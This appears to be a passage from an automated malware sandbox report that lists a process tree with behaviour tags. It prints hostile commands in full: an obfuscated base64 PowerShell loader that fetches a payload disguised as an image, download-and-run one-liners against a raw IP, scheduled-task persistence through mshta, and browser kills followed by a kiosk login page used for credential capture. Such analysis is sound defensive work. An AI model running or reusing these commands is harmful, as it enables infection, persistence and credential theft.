'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:280
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"7⤵
- Executes dropped EXE
PID:2296 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win7-x64&apphost_version=6.0.16&gui=true8⤵
- System Time Discovery
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1960 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1960 CREDAT:275457 /prefetch:29⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1792
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10147600101\3b9ee8ffbb.exe"C:\Users\Admin\AppData\Local\Temp\10147600101\3b9ee8ffbb.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1748 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn fOXUema5SkW /tr "mshta C:\Users\Admin\AppData\Local\Temp\0pEgp4leU.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
PID:1364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn fOXUema5SkW /tr "mshta C:\Users\Admin\AppData\Local\Temp\0pEgp4leU.hta" /sc minute /mo 25 /ru "Admin" /f9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2496
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\0pEgp4leU.hta8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988 -
C:\Users\Admin\AppData\Local\TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE"C:\Users\Admin\AppData\Local\TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:780
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10147610121\am_no.cmd" "7⤵
- System Location Discovery: System Language Discovery
PID:1580 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "BlPWgmaPtNx" /tr "mshta \"C:\Temp\T914aIuR7.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2232
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\T914aIuR7.hta"8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:280 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2320
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148390101\e267fb67b5.exe"C:\Users\Admin\AppData\Local\Temp\10148390101\e267fb67b5.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 12048⤵
- Loads dropped DLL
- Program crash
PID:2772
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148400101\a221fd437d.exe"C:\Users\Admin\AppData\Local\Temp\10148400101\a221fd437d.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\10148410101\156f54f6b5.exe"C:\Users\Admin\AppData\Local\Temp\10148410101\156f54f6b5.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1360 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking8⤵PID:2684
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking9⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2608 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.0.1884108428\65484423" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c27d9d4d-1f28-4626-9a6b-8b799e8c01b5} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 1324 4304758 gpu10⤵PID:2392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.1.2050025687\586108651" -parentBuildID 20221007134813 -prefsHandle 1504 -prefMapHandle 1500 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78ad92ec-6b8d-40f5-9d5f-fdf6237750b3} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 1512 43d1058 socket10⤵PID:2400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.2.1452751177\1730073598" -childID 1 -isForBrowser -prefsHandle 2020 -prefMapHandle 2036 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25930cb2-12d9-4769-a9fd-f2870fe037c1} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 2012 10460458 tab10⤵PID:1848
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.3.732523778\317768961" -childID 2 -isForBrowser -prefsHandle 2768 -prefMapHandle 2764 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5968bf29-4b51-4918-a44d-f85909a03e61} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 2796 1d8e1a58 tab10⤵PID:2380
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.4.687199415\1043258020" -childID 3 -isForBrowser -prefsHandle 3680 -prefMapHandle 3684 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dbefeca1-e9f8-411d-985c-616d597774bc} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 3708 1f9ebb58 tab10⤵PID:1936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.5.52533189\1126919164" -childID 4 -isForBrowser -prefsHandle 3816 -prefMapHandle 3820 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3aa12d9-d751-4a46-972f-c7eb66f2e2a0} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 3804 1fed0b58 tab10⤵PID:2940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.6.1806945454\1419939669" -childID 5 -isForBrowser -prefsHandle 3984 -prefMapHandle 3988 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26b2cd31-4861-448a-b911-ef8da3a8e1af} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 3972 1fed1758 tab10⤵PID:876
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148420101\30c6dab708.exe"C:\Users\Admin\AppData\Local\Temp\10148420101\30c6dab708.exe"7⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"7⤵
- Executes dropped EXE
PID:3796
-
-
C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe"C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe"7⤵
- Executes dropped EXE
PID:3356
-
-
C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:872 -
C:\Windows\system32\cmd.execmd.exe /c 67cc62a429f2f.vbs8⤵PID:1680
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"9⤵PID:3840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@